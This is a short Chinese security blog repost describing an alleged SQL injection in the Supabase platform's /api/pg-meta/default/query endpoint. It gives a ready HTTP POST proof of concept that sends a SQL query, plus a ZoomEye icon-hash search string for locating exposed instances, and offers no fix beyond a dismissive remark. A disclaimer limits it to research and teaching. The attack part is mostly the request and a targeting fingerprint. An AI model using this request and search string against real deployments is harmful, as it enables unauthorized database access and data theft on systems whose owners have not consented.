Supabase 后端服务平台 SQL注入【附POC】

admin 2024年1月9日12:18:13评论105 views字数 455阅读1分31秒阅读模式

 

 

漏洞详情

01

Supabase 后端服务平台/api/pg-meta/default/query对用户传入的数据没有进行校验和过滤,导致攻击者传入的SQL语句直接带入到数据库执行,形成SQL注入.
 

界面截图

02

Supabase 后端服务平台 SQL注入【附POC】

 

漏洞复现

03

payload

POST /api/pg-meta/default/query HTTP/1.1Host: Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 {"query":"select version()"}
回显:

Supabase 后端服务平台 SQL注入【附POC】

zoomeye语法

 

04

iconhash:"6c030f95ff31502a6d8113940a74b422"
Supabase 后端服务平台 SQL注入【附POC】

修复建议

05

没有,爱修不修
 

 

原文始发于微信公众号(棉花糖网络安全圈):Supabase 后端服务平台 SQL注入【附POC】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月9日12:18:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Supabase 后端服务平台 SQL注入【附POC】https://cn-sec.com/archives/2377993.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息